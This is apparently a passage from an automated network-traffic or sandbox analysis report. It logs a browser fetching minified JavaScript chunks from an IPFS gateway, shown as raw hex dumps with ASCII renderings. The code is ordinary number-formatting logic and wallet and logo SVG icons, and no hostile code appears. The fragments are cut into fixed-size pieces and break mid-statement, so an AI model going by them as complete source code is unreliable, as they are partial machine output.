                                                                                                                                                                                                                                                  Data Ascii: idateProps();var o=this.formatValueProp(r);this.state={value:o,numAsString:this.removeFormatting(o),mounted:!1},this.selectionBeforeInput={selectionStart:0,selectionEnd:0},this.onChange=this.onChange.bind(this),this.onKeyDown=this.onKeyDown.bind(this),thi
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 72 29 5b 30 5d 29 3b 76 61 72 20 61 3d 28 74 3d 28 74 2e 6d 61 74 63 68 28 6f 29 7c 7c 5b 5d 29 2e 6a 6f 69 6e 28 22 22 29 2e 72 65 70 6c 61 63 65 28 72 2c 22 2e 22 29 29 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3b 72 65 74 75 72 6e 2d 31 21 3d 3d 61 26 26 28 74 3d 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 61 29 2b 22 2e 22 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 61 2b 31 2c 74 2e 6c 65 6e 67 74 68 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 73 28 72 29 2c 22 67 22 29 2c 22 22 29 29 2c 6e 26 26 28 74 3d 22 2d 22 2b 74 29 2c 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4e 75 6d 62 65 72 52 65 67 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 70 72 6f 70 73 2c 6f 3d 72 2e 66 6f 72 6d 61 74 2c 6e
                                                                                                                                                                                                                                                  Data Ascii: r)[0]);var a=(t=(t.match(o)||[]).join("").replace(r,".")).indexOf(".");return-1!==a&&(t=t.substring(0,a)+"."+t.substring(a+1,t.length).replace(new RegExp(s(r),"g"),"")),n&&(t="-"+t),t},e.prototype.getNumberRegex=function(t,e){var r=this.props,o=r.format,n
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6e 65 77 20 45 72 72 6f 72 28 22 5c 6e 20 20 20 20 20 20 20 20 20 20 4d 61 73 6b 20 22 2b 74 2b 22 20 73 68 6f 75 6c 64 20 6e 6f 74 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 65 72 69 63 20 63 68 61 72 61 63 74 65 72 3b 5c 6e 20 20 20 20 20 20 20 20 22 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 50 61 74 63 68 65 64 43 61 72 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 63 28 74 2c 65 29 2c 74 68 69 73 2e 63 61 72 65 74 50 6f 73 69 74 69 6f 6e 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 76 61 6c 75 65 3d 3d 3d 72 26 26 63 28 74 2c 65 29 7d 29 2c 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 72 72 65 63 74 43 61 72 65 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e
                                                                                                                                                                                                                                                  Data Ascii: new Error("\n Mask "+t+" should not contain numeric character;\n ")},e.prototype.setPatchedCaretPosition=function(t,e,r){c(t,e),this.caretPositionTimeout=setTimeout((function(){t.value===r&&c(t,e)}),0)},e.prototype.correctCaretPosition=fun
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 6e 29 3b 74 3d 6e 26 26 2d 31 21 3d 3d 69 26 26 69 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 6e 2e 6c 65 6e 67 74 68 3f 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 69 29 3a 74 2c 61 26 26 28 74 3d 22 2d 22 2b 74 29 7d 72 65 74 75 72 6e 20 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 50 61 74 74 65 72 6e 46 6f 72 6d 61 74 74 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 68 69 73 2e 70 72 6f 70 73 2e 66 6f 72 6d 61 74 2e 73 70 6c 69 74 28 22 23 22 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 22 21 3d 3d 74 7d 29 29 2c 72 3d 30 2c 6f 3d 22 22 2c 6e 3d 30 2c 61 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 3d 61 3b 6e 2b 2b 29 7b 76 61 72 20 69
                                                                                                                                                                                                                                                  Data Ascii: .lastIndexOf(n);t=n&&-1!==i&&i===t.length-n.length?t.substring(0,i):t,a&&(t="-"+t)}return t},e.prototype.removePatternFormatting=function(t){for(var e=this.props.format.split("#").filter((function(t){return""!==t})),r=0,o="",n=0,a=e.length;n<=a;n++){var i
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 3f 21 5c 64 29 29 2f 67 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 2f 28 5c 64 29 28 3f 3d 28 5c 64 7b 33 7d 29 2b 28 3f 21 5c 64 29 29 2f 67 7d 7d 28 72 29 2c 6e 3d 74 2e 73 65 61 72 63 68 28 2f 5b 31 2d 39 5d 2f 29 3b 72 65 74 75 72 6e 20 6e 3d 2d 31 3d 3d 3d 6e 3f 74 2e 6c 65 6e 67 74 68 3a 6e 2c 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 29 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 6e 2c 74 2e 6c 65 6e 67 74 68 29 2e 72 65 70 6c 61 63 65 28 6f 2c 22 24 31 22 2b 65 29 7d 28 67 2c 63 2c 73 29 29 2c 6e 26 26 28 67 3d 6e 2b 67 29 2c 61 26 26 28 64 2b 3d 61 29 2c 76 26 26 28 67 3d 22 2d 22 2b 67 29 2c 74 3d 67 2b 28 68 26 26 66 7c 7c 22 22 29 2b 64 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 6d 61 74 4e 75 6d 53 74 72 69 6e 67 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                  Data Ascii: ?!\d))/g;default:return/(\d)(?=(\d{3})+(?!\d))/g}}(r),n=t.search(/[1-9]/);return n=-1===n?t.length:n,t.substring(0,n)+t.substring(n,t.length).replace(o,"$1"+e)}(g,c,s)),n&&(g=n+g),a&&(d+=a),v&&(g="-"+g),t=g+(h&&f||"")+d},e.prototype.formatNumString=functi
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 7c 7c 22 30 22 29 29 2c 63 3d 28 69 2e 6c 65 6e 67 74 68 3c 3d 65 3f 22 30 2e 22 2b 69 3a 70 2e 74 6f 46 69 78 65 64 28 65 29 29 2e 73 70 6c 69 74 28 22 2e 22 29 3b 72 65 74 75 72 6e 28 73 3f 22 2d 22 3a 22 22 29 2b 61 2e 73 70 6c 69 74 28 22 22 29 2e 72 65 76 65 72 73 65 28 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 3e 72 3f 28 4e 75 6d 62 65 72 28 74 5b 30 5d 29 2b 4e 75 6d 62 65 72 28 65 29 29 2e 74 6f 53 74 72 69 6e 67 28 29 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 31 2c 74 2e 6c 65 6e 67 74 68 29 3a 65 2b 74 7d 29 2c 63 5b 30 5d 29 2b 28 6f 3f 22 2e 22 3a 22 22 29 2b 6c 28 63 5b 31 5d 7c 7c 22 22 2c 4d 61 74 68 2e 6d 69 6e 28 65 2c 69 2e 6c 65 6e 67 74 68 29 2c 72 29 7d
                                                                                                                                                                                                                                                  Data Ascii: i||"0")),c=(i.length<=e?"0."+i:p.toFixed(e)).split(".");return(s?"-":"")+a.split("").reverse().reduce((function(t,e,r){return t.length>r?(Number(t[0])+Number(e)).toString()+t.substring(1,t.length):e+t}),c[0])+(o?".":"")+l(c[1]||"",Math.min(e,i.length),r)}
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 72 28 3b 74 5b 6e 2d 31 2d 6f 5d 3d 3d 3d 65 5b 61 2d 31 2d 6f 5d 26 26 61 2d 6f 3e 72 26 26 6e 2d 6f 3e 72 3b 29 6f 2b 2b 3b 72 65 74 75 72 6e 7b 73 74 61 72 74 3a 72 2c 65 6e 64 3a 6e 2d 6f 7d 7d 28 65 2c 72 29 2c 79 3d 53 2e 73 74 61 72 74 2c 78 3d 53 2e 65 6e 64 3b 69 66 28 21 61 26 26 79 3d 3d 3d 78 26 26 2d 31 21 3d 3d 66 2e 69 6e 64 65 78 4f 66 28 72 5b 64 5d 29 29 7b 76 61 72 20 77 3d 30 3d 3d 3d 70 3f 22 22 3a 68 3b 72 65 74 75 72 6e 20 72 2e 73 75 62 73 74 72 28 30 2c 64 29 2b 77 2b 72 2e 73 75 62 73 74 72 28 64 2b 31 2c 72 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 62 3d 61 3f 30 3a 73 2e 6c 65 6e 67 74 68 2c 4e 3d 65 2e 6c 65 6e 67 74 68 2d 28 61 3f 30 3a 6c 2e 6c 65 6e 67 74 68 29 3b 69 66 28 72 2e 6c 65 6e 67 74 68 3e 65 2e 6c 65 6e 67 74 68 7c
                                                                                                                                                                                                                                                  Data Ascii: r(;t[n-1-o]===e[a-1-o]&&a-o>r&&n-o>r;)o++;return{start:r,end:n-o}}(e,r),y=S.start,x=S.end;if(!a&&y===x&&-1!==f.indexOf(r[d])){var w=0===p?"":h;return r.substr(0,d)+w+r.substr(d+1,r.length)}var b=a?0:s.length,N=e.length-(a?0:l.length);if(r.length>e.length|
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 2e 6f 6e 43 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 2c 72 3d 65 2e 76 61 6c 75 65 2c 6f 3d 74 68 69 73 2e 73 74 61 74 65 2c 6e 3d 74 68 69 73 2e 70 72 6f 70 73 2c 61 3d 6e 2e 69 73 41 6c 6c 6f 77 65 64 2c 69 3d 6f 2e 76 61 6c 75 65 7c 7c 22 22 2c 73 3d 68 28 65 29 3b 72 3d 74 68 69 73 2e 63 6f 72 72 65 63 74 49 6e 70 75 74 56 61 6c 75 65 28 73 2c 69 2c 72 29 3b 76 61 72 20 75 3d 74 68 69 73 2e 66 6f 72 6d 61 74 49 6e 70 75 74 28 72 29 7c 7c 22 22 2c 6c 3d 74 68 69 73 2e 72 65 6d 6f 76 65 46 6f 72 6d 61 74 74 69 6e 67 28 75 29 2c 70 3d 61 28 74 68 69 73 2e 67 65 74 56 61 6c 75 65 4f 62 6a 65 63 74 28 75 2c 6c 29 29 3b 70 7c 7c 28 75 3d 69 29 2c 74 68 69 73 2e 75 70 64 61 74 65 56 61 6c 75 65 28 7b 66
                                                                                                                                                                                                                                                  Data Ascii: .onChange=function(t){var e=t.target,r=e.value,o=this.state,n=this.props,a=n.isAllowed,i=o.value||"",s=h(e);r=this.correctInputValue(s,i,r);var u=this.formatInput(r)||"",l=this.removeFormatting(u),p=a(this.getValueObject(u,l));p||(u=i),this.updateValue({f


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  29192.168.2.549742209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC504OUTGET /_next/static/chunks/7888.4670beb870221fb5.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17529
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreif2maztdkcwo3bdbfnieoygqqqavujkxwxxtvo6f5j3d32lsjmpky"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7888.4670beb870221fb5.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreif2maztdkcwo3bdbfnieoygqqqavujkxwxxtvo6f5j3d32lsjmpky
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028476
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 34 35 61 34 65 31 38 39 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4145a4e189d-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 38 38 38 5d 2c 7b 34 37 31 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 33 30 31 32 30 29 2c 6f 3d 72 28 39 30 31 34 39 29 2c 69 3d 28 72 28 36 37 32 39 34 29 2c 72 28 37 33 39 36 35 29 29 2c 73 3d 72 28 33 38 37 37 36 29 2c 61 3d 72 28 38 35 38 39 33 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 72 3d 28 30 2c 69 2e 48 54 29 28 29 2c 63 3d 72 2e 75 73 65 72 3b 72
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(73965)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;r
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 57 61 6c 6c 65 74 22 7d 2c 72 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 29 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 37 2e 33 32 30 33 20 31 37 2e 33 39 38 48 33 2e 33 32 30 33 31 43 32 2e 37 38 39 38 38 20 31 37 2e 33 39 38 20 32 2e 32 38 31 31 37 20 31 37 2e 31 38 37 32 20 31 2e 39 30 36 31 20 31 36 2e 38 31 32 32 43 31 2e 35 33 31 30 33 20 31 36 2e 34 33 37 31 20
                                                                                                                                                                                                                                                  Data Ascii: lns:"http://www.w3.org/2000/svg","aria-label":"Wallet"},r),{},{children:[(0,s.jsxs)("g",{clipPath:"url(#clip0_3719_3323)",strokeWidth:"2",children:[(0,s.jsx)("path",{d:"M17.3203 17.398H3.32031C2.78988 17.398 2.28117 17.1872 1.9061 16.8122C1.53103 16.4371
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 30 36 43 31 2e 34 36 35 37 35 20 35 2e 30 36 34 36 32 20 31 2e 33 32 30 32 31 20 35 2e 34 39 33 31 32 20 31 2e 33 32 30 33 31 20 35 2e 39 33 33 39 33 56 36 2e 33 39 37 39 33 22 7d 29 5d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 64 65 66 73 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 22 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 22 32 30 22 2c 68 65 69 67 68 74 3a 22 31 39 22 2c 66 69 6c 6c 3a 22 77 68 69 74 65 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 33 32 30 33 31 32 29 22 7d 29 7d 29 7d 29 5d 7d 29 29 7d 7d 2c 34 31 30 32 34 3a 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                  Data Ascii: 06C1.46575 5.06462 1.32021 5.49312 1.32031 5.93393V6.39793"})]}),(0,s.jsx)("defs",{children:(0,s.jsx)("clipPath",{id:"clip0_3719_3323",children:(0,s.jsx)("rect",{width:"20",height:"19",fill:"white",transform:"translate(0.320312)"})})})]}))}},41024:functio
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 65 74 75 72 6e 20 6f 26 26 28 6d 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 6d 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 6e 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 6e 29 29 2c 7b 70 72 65 66 69 78 3a 6e 65 77 20 49 6e 74 6c 2e 4e 75 6d 62 65 72 46 6f 72 6d 61 74 28 22 65 6e 2d 55 53 22 2c 7b 6d 61 78 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 2c 6d 69 6e 69 6d 75 6d 46 72 61 63 74 69 6f 6e 44 69 67 69 74 73 3a 6e 7d 29 2e 66 6f 72 6d 61 74 28 6d 29 2c 70 6f 73 74 66 69 78 3a 75 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 6f 3d 6d 28 7b 76 61 6c 75 65 3a 74 2c 76 69 73 69
                                                                                                                                                                                                                                                  Data Ascii: eturn o&&(m=Math.trunc(Number(m)*Math.pow(10,n))/Math.pow(10,n)),{prefix:new Intl.NumberFormat("en-US",{maximumFractionDigits:n,minimumFractionDigits:n}).format(m),postfix:u}};function p(e){var t=e.value,r=e.visibleDecimals,n=e.roundDown,o=m({value:t,visi
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6a 73 78 29 28 73 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 62 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 25 22 7d 29 2c 22 75 73 64 22 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 72 26 26 28 30 2c 61 2e 6a 73 78 29 28 73 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 6c 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 62 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65
                                                                                                                                                                                                                                                  Data Ascii: jsx)(s.Z,{component:"span",sx:{ml:.5},variant:d||b.variant,color:m||"text.secondary",children:"%"}),"usd"!==(null===r||void 0===r?void 0:r.toLowerCase())&&"undefined"!==typeof r&&(0,a.jsx)(s.Z,{component:"span",sx:{ml:.5},variant:d||b.variant,color:m||"te
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 75 72 72 65 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 69 66 28 6e 29 7b 76 61 72 20 74 2c 73 2c 63 2c 6c 2c 75 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6f 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 73 3d 74 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 6e 75 6c 6c 3d 3d 3d 28 63 3d 73 2e 63 68 69 6c 64 4e 6f 64 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 5b 30 5d 2c 64 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 77 69 64 74 68 22 29 2c 6d 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 65 69 67 68 74 22 29 2c 70 3d 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 76
                                                                                                                                                                                                                                                  Data Ascii: urrent)&&void 0!==e&&e.contentDocument)if(n){var t,s,c,l,u=null===(t=o.current)||void 0===t||null===(s=t.contentDocument)||void 0===s||null===(c=s.childNodes)||void 0===c?void 0:c[0],d=u.getAttribute("width"),m=u.getAttribute("height"),p=u.getAttribute("v
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 65 6e 74 22 2c 7b 69 64 3a 22 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 22 2c 78 31 3a 22 2e 38 34 33 22 2c 78 32 3a 22 2e 32 30 36 22 2c 79 31 3a 22 2e 31 33 35 22 2c 79 32 3a 22 2e 38 38 36 22 2c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3a 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 30 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 62 36 35 30 39 65 22 2c 69 64 3a 22 73 74 6f 70 32 22 7d 29 2c 28 30 2c 64 2e 6a 73 78 29 28 22 73 74 6f 70 22 2c 7b 6f 66 66 73 65 74 3a 22 31 22 2c 73 74 6f 70 43 6f 6c 6f 72 3a 22 23 32 65 62 61 63 36 22 2c 69 64 3a 22 73 74 6f 70 34 22 7d 29 5d 7d 29 2c 28 30 2c 64 2e 6a 73 78 29 28 22 6c 69 6e 65 61
                                                                                                                                                                                                                                                  Data Ascii: ient",{id:"linear-gradient",x1:".843",x2:".206",y1:".135",y2:".886",gradientUnits:"objectBoundingBox",children:[(0,d.jsx)("stop",{offset:"0",stopColor:"#b6509e",id:"stop2"}),(0,d.jsx)("stop",{offset:"1",stopColor:"#2ebac6",id:"stop4"})]}),(0,d.jsx)("linea
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 30 20 30 20 34 31 2e 33 39 33 2d 35 30 2e 32 37 38 20 31 31 33 2e 37 34 31 20 31 31 33 2e 37 34 31 20 30 20 30 20 30 20 36 2e 36 35 39 2d 32 31 2e 34 35 33 20 31 31 35 2e 34 20 31 31 35 2e 34 20 30 20 30 20 30 20 30 2d 34 36 2e 30 36 35 20 31 31 33 2e 36 36 32 20 31 31 33 2e 36 36 32 20 30 20 30 20 30 2d 31 37 2e 32 2d 34 30 2e 38 36 35 41 31 31 34 2e 36 31 39 20 31 31 34 2e 36 31 39 20 30 20 30 20 30 20 31 37 32 2e 34 38 35 20 32 32 2e 37 61 31 31 33 2e 37 34 20 31 31 33 2e 37 34 20 30 20 30 20 30 2d 32 31 2e 34 35 33 2d 36 2e 36 35 39 41 31 31 35 2e 31 34 35 20 31 31 35 2e 31 34 35 20 30 20 30 20 30 20 31 32 38 20 31 33 2e 37 31 34 7a 22 7d 29 2c 72 26 26 28 30 2c 64 2e 6a 73 78 29 28 22 69 6d 61 67 65 22 2c 7b 78 3a 22 32 35 22 2c 79 3a 22 32 35 22 2c
                                                                                                                                                                                                                                                  Data Ascii: 0 0 41.393-50.278 113.741 113.741 0 0 0 6.659-21.453 115.4 115.4 0 0 0 0-46.065 113.662 113.662 0 0 0-17.2-40.865A114.619 114.619 0 0 0 172.485 22.7a113.74 113.74 0 0 0-21.453-6.659A115.145 115.145 0 0 0 128 13.714z"}),r&&(0,d.jsx)("image",{x:"25",y:"25",
